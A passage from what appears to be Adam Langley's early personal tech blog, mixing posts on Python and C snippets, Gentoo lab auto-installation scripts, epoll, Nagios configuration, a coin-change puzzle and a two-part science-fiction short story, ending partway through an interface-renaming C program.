    filename                 syncthreading.pdf                            
    author                   {Adam Langley}                               
    
    > :view 
    xpdf /home/agl/lscape/1931bdf5e54e08edc866b00ff0f2a6a0&
    

    In this model there are strings, objects, bags and lists (collectively elements). Objects are unordered (string, elements) pairs and most of the things in that log are objects. Bags are unordered sets of elements and lists are ordered vectors of elements.

    That works to a point and I was just about to add backlinks to every object as a bag of backlinks and a link called .backlinks. But while links from objects are named, the backlinks would never be. This is ok in some cases (such as structural links), but most of the time it matters that you were linked to with the name author because that has information value in the other direction as well.

    So links are:

    • Properties: named at both ends, though it's important that each object knows which end it's on
    • Pointers: named at the source end only
    • Links: unnamed at both ends (bags and lists consist of these)

    (If you are an RDF type, think of Properties as Triples. I may end up with an RDF model, but I'll make my own way there.)

    Now, should I allow multiple Properties with the same name from the same object or force them via a bag? Objects are going to have multiple incoming Properties with the same name, so I don't see why not.
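
    A small sketch of Properties as links that are named at both ends, with several same-named Properties allowed in either direction. Element and add_property are hypothetical names for this example, not the code behind the terminal log above:

```python
class Element:
    """An object whose Properties are recorded at both ends."""

    def __init__(self, title):
        self.title = title
        self.outgoing = {}  # property name -> list of targets
        self.incoming = {}  # property name -> list of sources


def add_property(source, name, target):
    """Record the link under the same name on both the source and the target."""
    source.outgoing.setdefault(name, []).append(target)
    target.incoming.setdefault(name, []).append(source)


paper = Element("Sync Threading")
notes = Element("Landscape notes")
adam = Element("Adam Langley")

add_property(paper, "author", adam)
add_property(notes, "author", adam)

# Two incoming Properties with the same name, told apart only by their source.
print([e.title for e in adam.incoming["author"]])
```

    Storing a list per name on both sides means the outgoing case needs no special treatment compared with the incoming one.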

    Also need to think about indexes

    Disabling terminal line buffering

    from termios import *
    
    IFLAG = 0
    OFLAG = 1
    CFLAG = 2
    LFLAG = 3
    ISPEED = 4
    OSPEED = 5
    CC = 6
    
    def save (fd):
            return tcgetattr (fd)
    
    def restore (fd, data):
            tcsetattr (fd, TCSAFLUSH, data)
    
    def nobuffer (fd, when=TCSAFLUSH):
            """Disable terminal line buffering."""
            mode = tcgetattr (fd)
    
            mode[IFLAG] = mode[IFLAG] & ~(INPCK | ISTRIP | IXON)
            mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
            mode[CFLAG] = mode[CFLAG] | CS8
            mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON)
            mode[CC][VMIN] = 1
            mode[CC][VTIME] = 0
            tcsetattr(fd, when, mode)
    

    Why on earth isn't fold an inbuilt function? (this is a left fold)

    def fold (f, lst, init):
            cur = init
    
            for x in lst:
                    cur = f (cur, x)
            return cur
    

    Longest common prefix of two strings

    def common_root (s1, s2):
            "Longest common prefix of two strings"
            n = min (len (s1), len (s2))
    
            for x in range (n):
                    if (s1[x] != s2[x]):
                            return s1[:x]
            return s1[:n]
    

    And tab completion

    p = list (filter (lambda x : x.startswith (b), comps))
    if (len (p) > 0):
    	root = fold (common_root, p, p[0])
    	if (len (root) > len (your_current_string)):
    		your_current_string = root
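    The same idea as a self-contained function, for anyone who wants to try it. This is a sketch rather than the snippet above: complete is a hypothetical name, and it leans on os.path.commonprefix from the standard library, which computes a character-wise common prefix of a list of strings, in place of fold and common_root.

```python
import os.path


def complete(current, candidates):
    """Extend `current` to the longest prefix shared by all matching candidates."""
    matches = [c for c in candidates if c.startswith(current)]
    if not matches:
        return current
    root = os.path.commonprefix(matches)
    # Only ever lengthen what the user has typed, never shorten it.
    return root if len(root) > len(current) else current


print(complete("fo", ["foobar", "foobaz", "quux"]))
```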
    

    Fantastic quote from Bram...

    Fantastic quote from Bram

    In other good news, the IETF announced a new policy in RFCs against using MUST to describe behavior which is widely violated in practice, especially when that violation won't change for the foreseeable future.

    Sigh. Another April 1st a...

    Sigh. Another April 1st and, once again, we have an April Fool's overload. Come on people, only post them if they're any good!

    I sent the following to coderman in reply to this blog entry. It was a little rushed since I was typing over a dial-up ssh (as am I with this actually) and it has inspired me to actually code up something, even if it's far short of what it could be. Hopefully it will give some insights (agl's nth rule: you don't understand it until after you code it).

    What you are talking about is very close to `the Unix philosophy'. One of the
    fantastic things about Unix is: cat /dev/sda1 | gzip > /backup/`date +%s`.gz
    
    Utility goes up super-linearly with the number of pluggable components.
    
    Now this stuff gives me nightmares, mainly because I'm generally always
    thinking about this stuff off and on, and have been for years. Your design of
    interfacing P2P with the filesystem is a good example of increasing the utility
    (and usability, from my point of view) of an application by exposing it using
    common interfaces. The design of those interfaces is just fantastically
    difficult.
    
    The `everything's a file' idea of Unix is good. But what is really missing is a
    userfs module in the kernel. Such things have existed at points in time, but
    never has there been a polished one (or even one included in the main kernel
    src). This limits the filesystem abstraction to devices and a few other little
    things and leaves bodges like PRELOAD libraries and GnomeVFS around. But we
    really need to expose application data and not have to end up writing fragile
    regexps which break on every minor release.
    
    I'm always wondering about designing a `better' system for this but generally
    get stuck in a loop:
    
    * Requires a fantastic number of components
    * and a lot of abstraction points that we don't have at the moment
      (most programs' output falls into a few simple blocks like `typed table'
       (think `ls`) or `dictionary' (something like ifconfig) or nestings of the
       same. ls shouldn't know anything about terminals, it should just output
       a table and let the UI handle it (if the output is going to a UI). But then,
       if we are doing this properly, all code should use `ls` to get directory
       listings and that's a lot of forking and stuffing data over pipes.) Thus...
    * it would be fantastic if everything was in a single address space
    * so a `safe' language is needed. Quite possibly a new language completely
    * but that's a hell of a lot of work and makes the barrier to adoption
      pretty high.
    * So we cut down the number of components and dream about making it better..
    * 
    
    (that was a bit unplanned, but I'm on a metered dialup at the moment I'm
    afraid.)
    
    -- Adam Langley agl@imperialviolet.org http://www.imperialviolet.org (+44) (0)7986 296753 PGP: 9113 256A CC0F 71A6 4C84 5087 CDA5 52DF 2CB6 3D60

    Seems that the US may have used an EMP...

    Term's over, so I'm back ...

    Term's over, so I'm back home and back on a dialup and ferrying floppies between computers whenever I need to get anything onto my computer. Ah, the joys of non-IC Internet connections.

    Just before I left I pretty much had an automatic installation of Gentoo working, we'll just have to see if I can remember what on Earth I was doing when I go back in 5 weeks.

    This holiday will be mostly revising, so there's not going to be much stuff worthy of posting here going on, but there are some new photos of my halls Xmas party up.

    Epoll

    From LWN

    One aspect of the epoll interface is that it is edge-triggered; it will only return a file descriptor as being available for I/O after a change has happened on that file descriptor. In other words, if you tell epoll to watch a particular socket for readability, and a certain amount of data is already available for that socket, epoll will block anyway. It will only flag that socket as being readable when new data shows up.

    Edge-triggered interfaces have their own advantages and disadvantages. One of their disadvantages, as epoll author Davide Libenzi has discovered, would appear to be that many programmers do not understand edge-triggered interfaces. Additionally, most existing applications are written for level-triggered interfaces (such as poll() and select()) instead. Rather than fight this tide, he has sent out a patch which switches epoll over to level-triggered behaviour. A subsequent patch makes the behaviour configurable on a per-file-descriptor basis.

    Fantastic. Level-triggered interfaces are nicer because they need fewer system calls. With edge-triggered you always need to call read/write until it returns EAGAIN, otherwise you can miss data. That means at least 2 calls per edge, while level-triggered generally means only 1 call per edge.

    Also, edge-triggering causes locking headaches when dealing with multithreaded apps, and with these patches it should be possible to quite simply alter existing code to use epoll.
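    The difference is easy to see from Python on a Linux box. A minimal sketch, assuming a kernel with epoll and Python's select.epoll wrapper; poll_twice is a hypothetical helper. It makes a socket readable, then polls twice without reading anything in between:

```python
import select
import socket


def poll_twice(flags):
    """Make a socket readable, then poll twice without reading from it."""
    a, b = socket.socketpair()
    ep = select.epoll()
    try:
        ep.register(b.fileno(), flags)
        a.send(b"x")            # the "edge": b becomes readable
        first = ep.poll(0.1)    # both modes report the socket here
        second = ep.poll(0.1)   # nothing was read and nothing new arrived
        return len(first), len(second)
    finally:
        ep.close()
        a.close()
        b.close()


level = poll_twice(select.EPOLLIN)
edge = poll_twice(select.EPOLLIN | select.EPOLLET)
print("level-triggered:", level)
print("edge-triggered: ", edge)
```

    In level-triggered mode the second poll still reports the socket because unread data remains. In edge-triggered mode it reports nothing, which is why edge-triggered code has to keep reading until EAGAIN.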

    Happy (Belated) Birthday IV!

    I totally missed it, but IV (in its current form) was 1 year old on March 11th. Woo!

    I can now read what I was doing a year ago, which is nice. Oddly enough, I was doing pretty much the same thing... (read on)

    Mass Installing Gentoo

    Dept/Computing at Imperial has rather a lot of computers, as I'm sure you can guess. Nearly all of them install from a common base in order to keep the sysadmin tasks manageable. At the moment that base system is SuSE 7.2, with a few key packages upgraded (X, kernel, JDK and so on). Of course, SuSE 7.2 is getting a bit old now and we are looking for a new install for the coming year.

    We are testing a lot of distros, but at the moment I'm trying Gentoo. Good points:

    • It's very easy to autoinstall because the packages shut up (see below)
    • It's very current

    Bad points:

    • Since we cannot afford to build from source we have to install binary packages, thus they can only be optimised to fit the lowest class of CPU (PPro for us I believe)
    • Gentoo packages break a fair amount (missing dependencies etc)
    • The gentoo-sources kernel package is just crap

    To autoinstall it I have a GRUB boot disk that TFTP/NFSroot boots a 2.4.20 kernel with init=/bin/bash. That will run a Python script (at the moment you have to type a command line) that finds the IP of the box (the kernel does DHCP), does a DNS lookup to get the hostname and uses a config file with regexps on the hostname to find a series of scripts to run.
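    The hostname-to-scripts step could look something like the sketch below. It is not the real script: the rule format, the hostname patterns, the script names and the helpers scripts_for and hostname_for are all made up for illustration. Only socket.gethostbyaddr and the re module are real library calls.

```python
import re
import socket

# Hypothetical rules: (regexp on the hostname, scripts to run in order).
RULES = [
    (r"^lab\d+$", ["partition", "format", "stage1", "internal"]),
    (r"^server-", ["partition", "format", "stage1"]),
]


def scripts_for(hostname, rules=RULES):
    """Return the scripts of the first rule whose regexp matches the hostname."""
    for pattern, scripts in rules:
        if re.search(pattern, hostname):
            return scripts
    return []


def hostname_for(ip):
    """Reverse DNS lookup, keeping only the short name before the first dot."""
    name, _aliases, _addresses = socket.gethostbyaddr(ip)
    return name.split(".")[0]


print(scripts_for("lab12"))
```

    Taking the first matching rule keeps the config file order-sensitive, so specific patterns can sit above catch-all ones.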

    I have a quick python module to handle writing partition tables, other than that the scripts are at the bottom (these aren't final by any means)

    Everything is installed from binary packages built on a 2-way Xeon (which looks like a 4-way because of hyperthreading). The grub packages seem broken at the moment, however.

    If you look at the scripts, all you need to do is mount the /usr/portage directory from the server and make /usr/portage/distfiles a tmp area.

    #!/bin/sh
    
    /sbin/mkfs.xfs -f /dev/ide/host0/bus0/target0/lun0/part2
    /sbin/mkswap /dev/ide/host0/bus0/target0/lun0/part1
    swapon /dev/ide/host0/bus0/target0/lun0/part1
    mount -n -t xfs /dev/ide/host0/bus0/target0/lun0/part2 /mnt
    
    import partitions
    
    def run():
            p = partitions.PartitionTable("/dev/ide/host0/bus0/target0/lun0/disc")
            p.add_size (0x82, 512, 0)
            p.add_size (0x83, -1, 1)
            p.write ()
    
    cd /mnt
    tar xjv < /stage1-x86-1.4_rc3.tar.bz2
    mount -n --bind /usr/portage /mnt/usr/portage
    mount -n --bind /mnt/tmp /mnt/usr/portage/distfiles
    cp /etc/make.conf /mnt/etc/make.conf
    cp /etc/resolv.conf /mnt/etc/resolv.conf
    cp /etc/ld.so.conf /mnt/etc/ld.so.conf
    cp /config/gentoo-systems/internal /mnt/internal
    chmod a+x /mnt/internal
    chroot . /internal
    
    cd /
    umount /mnt
    
    #!/bin/sh
    
    source /etc/profile
    ldconfig
    emerge -K gcc gettext glibc baselayout texinfo zlib binutils
    ln -sf /usr/share/zoneinfo/Europe/London /etc/localtime
    emerge -K system
    emerge -K kde
    emerge -K prelink
    emerge -K sysklogd
    emerge -K grub
    emerge -K vim
    emerge -K libogg
    emerge -K libmng
    /usr/bin/fc-cache
    mkdir -p /boot/grub
    cd /boot/grub
    cp -a /usr/share/grub/i386-pc/* .
    printf "root (hd0,1)\nsetup (hd0)\n" | grub
    
    umount /usr/portage/distfiles
    swapoff /swap
    umount /usr/portage
    umount /dev
    umount /proc
    mkdir /lib/modules/2.4.20-xfs

    Stage Craft

    Another busy day yesterday. Setting up some lights (I'm in the very light brown t-shirt). And the results of those lights (think what it would have looked like if we had used green gels) and inside the venue (which was generally quite empty because everyone was downstairs for Artful Dodger).

    Quarantine - Greg Egan

    Greg Egan is a fantastic author and Quarantine is one of his very early books, and it shows a little. The book is full of the usual wonders of Egan's ideas but I felt that the ending was a little weak. I couldn't say why, there was no good reason why it wasn't a good ending - had a neat little twist and there weren't any loose threads left, but I felt like it didn't quite get back to the home key (GEB reference, for those who get it).

    You know it's time to upgrade when...

    ... the load of the box you're building Gentoo packages on can't hit the number of processors because it can't download source code fast enough when it's coming in at 1.6MB/s.

    Not too much has been happening. Building lots of Gentoo binary packages for possibly installing on department lab machines next year (see above). Point to note: the userpriv option breaks stuff.

    Maybe with 64-bit address spaces we can finally get rid of filesystems as a user-visible system and all switch to single-level persistent object stores. Anyway, AMD looks like they have the best 64-bit offering at the moment and EROS's 2002 paper on single-level store design is here

    Valenti Speech

    Valenti's speech is quite good. Apart from the fact that he's wrong on almost every important point, he speaks very well. I don't know if he gets things wrong because he really doesn't understand, or because he's just trying to find an acceptable cover for his clients' greed.

    He simply (seemingly) doesn't get that there is something fundamentally different about my physically depriving you of something and taking a copy. Of course, it's profitable to ignore that. He also asserts (unquestioned) that there are no alternate business models. Of course, it's profitable to ignore them (for the moment). He also doesn't get the difference between information and the physical expression of that information. Of course, it's profitable to treat information as a product.

    He just fundamentally doesn't get it. I wish I had a transcript of his answer to a question about DVD Region Encoding where he just assumes that the legal system is there to uphold whatever he deems best. It's just breathtaking arrogance.

    Nagios

    Nagios looks like a really good status monitoring tool. Have a look at the demo. I hope to get it going in DoC, but it requires a heck of a lot of installing. Thankfully there are (nearly) wonderful Gentoo ebuilds which do everything needed. (Only nearly wonderful because the ebuild had a bug; patch mailed to the maintainer. On the same note, the prelink ebuild also has a missing dependency on libc6-2.3.2; patch sent to, and acked by, the maintainer).

    Unfortunately, DoC servers don't run Gentoo (or Debian I'm afraid) so it looks like I'm going to be doing it by hand.

    Nagios Configuration

    Nagios has quite a nasty configuration I'm afraid. So here's a Python script to do some of it for you.

    The input is a series of lines. The first character determines the type of line and they go like this:

    • Hhost name,service 1[,service 2...]
    • Ggroup name,group alias,member 1[,member 2...]
    • Sservice name,service alias,service comment

    Example:

    Sping,Ping,check_ping!100.0,20%!500.0,60%
    Shttp,HTTP,check_http
    Sssh,SSH,check_ssh
    Ssmtp,SMTP,check_smtp
    Snntp,NNTP,check_nntp
    Snfs,NFS,check_rpc!nfs
    Hbulbul,ssh
    Hsax,ssh
    Hsparrow
    Gservers,Servers,bulbul,sax,sparrow
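    Reading that input format takes only a few lines. The sketch below covers the parsing half only and is not the script itself: parse_config is a hypothetical name, and treating the third S field as a check command is an assumption based on the example above, where it holds things like check_ping!100.0,20%!500.0,60%.

```python
def parse_config(lines):
    """Parse H/G/S lines into dictionaries of hosts, groups and services."""
    hosts, groups, services = {}, {}, {}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        kind, rest = line[0], line[1:]
        if kind == "H":
            name, *host_services = rest.split(",")
            hosts[name] = host_services
        elif kind == "G":
            name, alias, *members = rest.split(",")
            groups[name] = (alias, members)
        elif kind == "S":
            # Split at most twice: the last field may itself contain commas.
            name, alias, command = rest.split(",", 2)
            services[name] = (alias, command)
        else:
            raise ValueError("unknown line type: %r" % line)
    return hosts, groups, services


example = [
    "Sping,Ping,check_ping!100.0,20%!500.0,60%",
    "Sssh,SSH,check_ssh",
    "Hbulbul,ssh",
    "Hsparrow",
    "Gservers,Servers,bulbul,sax,sparrow",
]
hosts, groups, services = parse_config(example)
print(services["ping"])
```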
    

    GLibc6 2.3.2

    Just a quick warning: libc6 2.3.2 causes many programs to cough on an IP address of 0. I know it's not a very valid IP address, but it was a damn useful way of saying localhost. Just s/ 0 / 127.0.0.1 /g

    Debian used to provide a ...

    Debian used to provide a very useful file called base2.2.tgz for potato. In it was a very basic, but runnable, Debian system from which you could install everything else. You can still get the one for 2.2, but there's no such file for 3.0. Instead you have a tarball containing the debs of all the critical packages. Which is nice, except that you don't have dpkg to install them.

    So, converting them all to tgz's and unpacking them gives you something close to a base system, except that dpkg doesn't think that anything is installed. Trying to install anything (including dpkg) pulls in libc6, and the inst script requires that dpkg know about itself. But you can't pull in dpkg because that requires libc6...

    In the end you have to install base2.2.tgz and upgrade it. Yay Gentoo, Boo Debian.

    So here's an odd thought ...

    So here's an odd thought in the hours before I go and be Strike Crew until 6 in the morning.

    In a world which seems to respect worse is better designs we shouldn't be looking to stamp principles all over our political system. We should, instead, be looking for an incremental approach; a directed genetic algorithm. David Brin thinks that this has been happening for decades with good effect.

    So, we would hope that all the political parties would have very similar views. The final result would be that everyone was in exactly the same political position, on top of the highest hill. (or, if you think of a GA as a minimising function, then at the bottom of the lowest valley).

    So, we should all rejoice that it's so hard to tell our political parties apart because it's a sign of increasing perfection [1, 2 and 3] (and yes, it is wonderful that number 2 there has a .com URL).

    No, I don't really believe it either. Nice thought for a rainy day though.

    Coder's recent entry contains...

    Coder's recent entry contains a link to a really good article on pricing. (similar to that Wal-Mart article I linked to).

    He then goes on to talk about how wonderful a database of prices would be so that anyone could instantly compare prices on a given product.

    I remember that such a database was going to be one of the great things about the Internet. There was a short story in New Scientist years ago, set in the future where baked beans were the only thing that still had brand loyalty. Everything else was bought from whoever sold at the lowest price. Hyperbole, but you get the idea.

    But I would bet that this database won't ever exist. For one, as that article covers, prices are becoming increasingly personalised so there would almost have to be one database per person. Also, companies don't want it.

    How many companies offer an XMLRPC/SOAP/etc way to find out the price of anything? Companies don't want a market where their prices are driven into the ground. They want to draw you into their advertising wonderland and certainly don't want RSS type applications searching for the lowest prices. We have all seen the unparsable mess they create when they are trying to make a good website. Just think what they could manage if they were trying to obscure the prices. When they are distorted images (designed to be hard to OCR, Turing Test like) it just won't be worth the effort.

    My Dilbert books are in Cheltenham, but I think it's in the Dilbert Future where Scott Adams talks about confusopolies. He was spot on.

    Python Metaclass Programm...

    Digital Sound Desks

    This is the current sound desk that Imperial Union use. As analog desks go it's really nice, but one cannot help but wonder, every time that it's used, if a digital one wouldn't be better.

    I can decode an ogg stream, FFT it, FFT it back and write it to the sound card using 30% of one of my PII 450s. That suggests that I could process about 6 CD quality streams in real time. That's not helpful as we have 32 incoming XLR feeds. Also, quality ADCs output 96kHz, 24-bit and I could only manage a couple of those.

    Thankfully, FFT is a pretty simple operation and a Xilinx (or 2, or 3 etc) could handle all 32 96/24 streams. A quick calculation suggests that it's 4.6 MB/s (remembering that a real domain FFT can throw away half the results) and that's easy to handle.
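    The 4.6 MB/s figure appears to come out of the following arithmetic. This is a reconstruction, assuming 3 bytes per 24-bit sample, one channel per XLR feed, and MB meaning 10^6 bytes:

```python
streams = 32            # incoming XLR feeds
sample_rate = 96_000    # samples per second per feed
bytes_per_sample = 3    # 24-bit samples

raw = streams * sample_rate * bytes_per_sample   # bytes per second off the ADCs
after_fft = raw // 2    # keeping half the results, as described above

print("raw:       %.1f MB/s" % (raw / 1e6))
print("after FFT: %.1f MB/s" % (after_fft / 1e6))
```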

    Still, I might see if I can simulate some 3D spaces with sound in them and have a play about with feedback suppression etc.

    Does anyone have the audi...

    Does anyone have the audio recordings of CodeCon? Mail me.

    "US dirty tricks to win vote on Iraq war". Who wants to bet that 'a friendly foreign intelligence agency asking for its input' is the UK?

    Watson (on the 50th anniversary of his discovery) says stupidity should be cured

    BCS (British Programming ...

    BCS (British Programming Competition) today, so a 6:30am start and off to IBM in Winchester. The rules are very different from the BIO and IOI that I'm used to. For one, you enter in teams of 5 and you only have a single computer.

    Things certainly weren't helped by the fact that I didn't wake up until 1pm (Cola for lunch did it). After that things started moving, but we should have done a lot better really. In the end we came fifth, beating the Cambridge team at least.

    Coins

    What's special about the value of English coins that a greedy algorithm for picking them seems to work right? If you only had 1p, 20p and 50p, and you were trying to make 60p then a greedy algorithm would get you a solution with 11 coins (50 + 10×1), while the best one does it in 3 (3×20). So a greedy solution doesn't work in the general case, but I can't find a counter example for English coins.

    So, is there a counter example that I've missed, or is there something special about the value of English coins?

    (English coins are 200p, 100p, 50p, 20p, 10p, 5p, 2p and 1p)
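    A brute-force way to go looking for a counterexample is to compare the greedy count against a dynamic-programming optimum for every amount up to some limit. The sketch below is a search and not a proof: the function names are my own and the limit of 500p is an arbitrary choice.

```python
ENGLISH = [200, 100, 50, 20, 10, 5, 2, 1]


def greedy_count(coins, amount):
    """Number of coins used when always taking the largest coin that fits."""
    count = 0
    for coin in sorted(coins, reverse=True):
        count += amount // coin
        amount %= coin
    return count  # assumes a 1p coin exists, so the amount always reaches 0


def optimal_counts(coins, limit):
    """best[a] is the fewest coins that make amount a, for 0 <= a <= limit."""
    best = [0] * (limit + 1)
    for amount in range(1, limit + 1):
        best[amount] = 1 + min(best[amount - c] for c in coins if c <= amount)
    return best


def first_counterexample(coins, limit):
    """Smallest amount where greedy uses more coins than necessary, or None."""
    best = optimal_counts(coins, limit)
    for amount in range(1, limit + 1):
        if greedy_count(coins, amount) != best[amount]:
            return amount
    return None


print(first_counterexample([1, 20, 50], 100))
print(first_counterexample(ENGLISH, 500))
```

    For 1p, 20p and 50p the search lands on 60p, as in the example above. For the English coins it finds nothing up to 500p.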

    Rent (part 2)

    Read the first part first or this will make no sense at all.

    Rupert had given the people in his labs the rest of the week off once the bulk of the first message had been decoded, but many of the people there couldn't imagine anything better in the world than working to finish the decoding. There were many details still to be understood, but they were falling under the attack faster and faster. People in the labs were conversing in the highly structured language of the alien message and outsiders were starting to have problems following conversations.

    The next morning, Rupert was once again standing in the Nu-Vu conference room which had been converted into a semi-permanent media war room, starting to hate shirts and ties as the lights above baked him.

    "Last night, several members of the Nu-Vu labs team that helped to decode the first message received another via the satellite communications equipment that was set up immediately once we started decoding. At this moment we can be sure that someone on Earth sent the reply.

    The communication with the aliens started at 0233 this morning and terminated at 0245. It mostly consisted of incoming information and we are still revising our translation. I hesitate to say anything while our teams are still unfinished, but this cannot wait any longer. Please understand that details may change.

    As best we can tell, and I'm finding this pretty hard to believe, the situation is this:

    Our entire universe is a simulation. Every interaction of every particle is calculated at each step in time and the universe is advanced. As we are part of the universe we perceive this as forward motion in time. We think, and translations of this are still sketchy, that this information is embedded somehow in the physical working of the universe and that we would have discovered it once our physics was advanced enough.

    There are many universes like ours, differing only in the physical laws that govern them. The purpose of all these universes is to generate mathematics and the reason that the aliens are telling us all this is because we are falling behind. Unless we produce enough this universe will be terminated. In short, they need help paying the rent.

    Because of this, they are seeking to contact all the unenlightened species and asking them to package up all their mathematical knowledge into their language. In a little over 22 years they will be back to collect it from us and deliver it to a point in space that acts as an information conduit out of the universe.

    At our request, we think they have agreed to take an observation capsule to this point, which we are calling the origin.

    That's it. I'm going back to the labs now and will brief you again in half an hour with any corrections to that translation. The wording is our own, but we are quite confident that the important points are correct. I know how fantastic this all sounds and I think it's going to be another interesting day.

    Thank you."

    The news didn't speak of anything else for a week.

    Rupert remembered motion in space being very slow and delicate. The arms that extended from the top and bottom of the window were anything but. They shot into place with perfect accuracy, coupling with the origin at the top and bottom. Barely a second after that they retracted again and, in a moment, had vanished. Was that it? Had the whole of human mathematical knowledge and that of an unknown number of other races been transferred in that short time? It had taken over 20 years of painstaking but frantic work, coordinated by an international body led by Rupert, to convert proofs into the rigorous format that the Gods (as the beings who ran the universe had become known) demanded. Many had failed under the close scrutiny and mankind hoped that it was enough. The origin seemed to start moving as the ship turned for the return journey.

    The cream of human mathematicians that populated the capsule began to drift away from the window. Further away from Earth than any human had ever been, a professor dropped an empty Starbucks cup into the bin. They were all thankful for the 1 gee artificial gravity that the alien ship provided the Nu-Vu capsule that looked so out of place bolted onto the alien ship. It seemed that only humans had requested a ride. Or maybe no other unenlightened species had been found.

    Time stopped.

    The universe disappeared.

    Physical laws twitched almost imperceptibly.

    At a single point an unimaginable amount of energy was poked into memory.

    Codecon is going on at th...

    Codecon is going on at the moment. As far as I knew, it was in a 21+ venue again (it was in DNA last year) but there are some noises on IRC that it's only 18+. Damn! I might have been able to go! Probably couldn't have afforded it anyway. Hopefully there will be tarballs of the audio again.

    The air-con in the labs had failed and it's getting pretty hot in here now with all 150 or so computers. However, I have switched to using Phoenix (currently the best browser, IMHO) so it's not all bad news

    The carefully planned gen...

    The carefully planned generator that was meant to keep the core servers running during the power cut, died due to earth leakage. The UPSes let the servers down gently, but they were still down for a while.

    And oddly, we managed to blow a lot of fuses somehow. Admittedly, some of them were 1 amp fuses and it doesn't take a lot to kill those. (somehow siskin now needs at least a 3 amp fuse when it has lived on 1 amp for months). We also managed to blow a few power supplies in a room which was totally isolated. The mind boggles.

    Anyway, things are mostly working now.

    IC draws so much power (d...

    IC draws so much power (despite the fact that we have our own power station on campus) that the supply is having to be upgraded. Because of this Dept/Comp are having a power cut tomorrow morning. We should have a genny, but I don't know how many of the servers we can put on it, so IV may be down for a while.

    Rent

    Here's the first part (of 2) of a really-short story.

    Everyone in the capsule bustled around the window as the origin swung into view. The balance of politeness and eagerness kept the crew from pushing to get closer, but just barely. As the reflection of the ship and stars twisted and warped around the perfect surface its shape became clear. "Axial symmetry. Bugger. Doesn't define direction then" thought Rupert.

    Rupert had been a middle manager at Nu-Vu Labs during first contact. Nu-Vu was the unlikely, but fortunate, result of the collapse of NASA. While most companies were happy to peck tiny parts of NASA for their own ends, the founders of Nu-Vu had managed, somehow, to get funding to buy large chunks of NASA's research divisions through a number of mind-contorting legal agreements. It now did outsourced research for hire for a fair number of the Fortune 1000 companies. Quite how it had all worked, Rupert wasn't sure. He was just very glad that it had.

    Academically acceptable, Rupert had never excelled at anything much and had staggered, more than anything, down his career path. Well off parents had managed to get him into Stanford and he came out as an average management type in a world full of average management types. With a couple of years experience doing nothing of note, getting the job at Nu-Vu (which was hiring as fast as possible) had been the biggest break of his life. However, at the time, managing a group that researched communication theory had merely been a quick escape from a small company that now included the other half of the messy end of a relationship.

    It just happened that a few months later the first alien message was received and the resulting effort to decode it meant that communications theory enjoyed the steepest rise in attention and funding of any research area, ever.

    The media went into a fit. The raw data from the SETI project was distributed all over the 'net and it seemed that everyone on the planet had their own take on what it meant. Channels were dedicated to following the researchers who were poring over the data 24 hours a day all around the world and while the cranks got their 15 minutes of fame, explaining to the camera their latest theory, Rupert's face led most of the reports.

    It wasn't that he was particularly smart (in fact, truth be told, he didn't even grasp half of what was going on in his own lab) but he had the right face and was junior enough a manager to seem involved. Because of this, it was he who announced, after 2 days, that the aliens had asked for us to ring them back and had given the position of a communications relay and frequency to do so.

    The talk shows exploded. Everyone on the planet had an opinion of what we should do and it was only fueled by the pictures of the communications relay taken by Hubble (which silenced many of the people who doubted that the original message was genuine).

    But few people commented that the debates were rather useless. If the first message had been picked up and decoded in private then it could have been contained. But SETI wasn't that sort of organisation and had spread the message far and wide.

    No one knows, to this day, who sent the reply.

    Microsoft Visitation

    Dear old M$ came a visiting today to espouse the virtues of .NET. The front row of the lecture theatre was full of systems people (myself included) wearing Apple, Linux and WebSphere T-shirts, so it was a pretty tough audience.

    But the M$ guy spoke really well and said only a few dumb things ("ASP is a scripting language so it runs on the client", "You need the R&D of commercial software houses to develop quality products") and it was generally a pretty noddy introduction to .NET.

    He demoed VS.NET doing web services stuff (it really looks like web services are a Big Thing (tm) at Microsoft now) and it worked well. But like most M$ stuff, if you wish to change any of the details you had better pre-book the triple heart bypass operation for the stress. He also showed linking a C# and J# (Java to you and me) application together, and he used vim to edit the files no less.

    I also got to play with a Tablet PC. The handwriting recognition worked well for me (I have the girliest handwriting, however), but it's nothing special. A neat packaging of technology - no great breakthroughs.

    Hmm, that's actually a pretty positive entry about M$ I know, but they are being really nice to us. We (as students of Dept of Comp) can now get any M$ software for free. Don't know why we would wish to, but we could

    XFree 4.2.99 has transpar...

    XFree 4.2.99 has transparent cursors, which is quite nice

    Lucrative is a new anonymous cash project (yes, another one and we're still waiting to hear a peep out of OpenDBS; hint Ryan) but it's there anyway. These projects can generally be classified pretty grossly and Lucrative is based on Lucre, but I can't remember the classification of Lucre.

    It seems that Intel have really tried with their compiler (non-free-speech but free-beer for non-commercial) and made it a GCC drop-in. It can't compile a kernel without a fair amount of bodges, but I managed to get portage to use it and it compiled a number of packages perfectly. I just need to benchmark them now.

    There was a fire alarm a...

    There was a fire alarm at 4:30 this morning. I grabbed my coat, jumped into my slippers and got out of the building. Seeing I was the only person there I yelled,

    "First Post!"

    (read the previous post f...

    (read the previous post first)

    Guess what? It had happened! It just so perfectly matched the divine comedy that is my life I never really had any doubt

    I think JWZ and I have th...

    I think JWZ and I have the same personal gods who take great pleasure in our misfortune. (seriously, read that link). However, unlike JWZ I actually laugh along.

    I suddenly realised something at about 10 this morning walking down a corridor and nearly wet myself. People were walking past me quickly as I just spontaneously burst into fits of giggles. I'm sure a fair number of random people I've never met now think I've a serious mental problem. And I'm still going hours later!

    Thing is, I don't actually know that it's happened. But it's just so perfect, and so wonderfully typical of me I'm sure it has. The hand of fate will not be thwarted!

    But I'm afraid, dear reader, that the details shall not grace these pages.

    Did you know you can rena...

    Did you know you can rename network interfaces under Linux? It could be quite useful to have a utility that reads a mapping of MAC addresses to names and sets all the interface names. That way you could work with inside and outside and not eth0 and eth1. A quick utility for your renaming pleasure:

    /* if_rename.c - Renames linux network interfaces
     * Adam Langley <aglREMOVETHIS@imperialviolet.org>
     * % gcc -o if_rename if_rename.c -Wall
     */
    
    #include <sys/ioctl.h>
    #include <sys/socket.h>	/* socket(), PF_INET, SOCK_STREAM */
    #include <net/if.h>
    #include <linux/sockios.h>
    #include <stdio.h>
    #include <string.h>
    
    int
    main (int argc, char **argv)
    {
    	struct ifreq ifr;
    	int fd;
    
    	if (argc != 3) {
    		printf ("Usage: %s <old interface name> <new interface name>\n", argv[0]);
    		return 1;
    	}
    	
    	if (strlen (argv[1]) > IFNAMSIZ - 1 || strlen (argv[2]) > IFNAMSIZ - 1) {
    		printf ("String too long (max length is %d chars)\n", IFNAMSIZ - 1);
    		return 2;
    	}
    
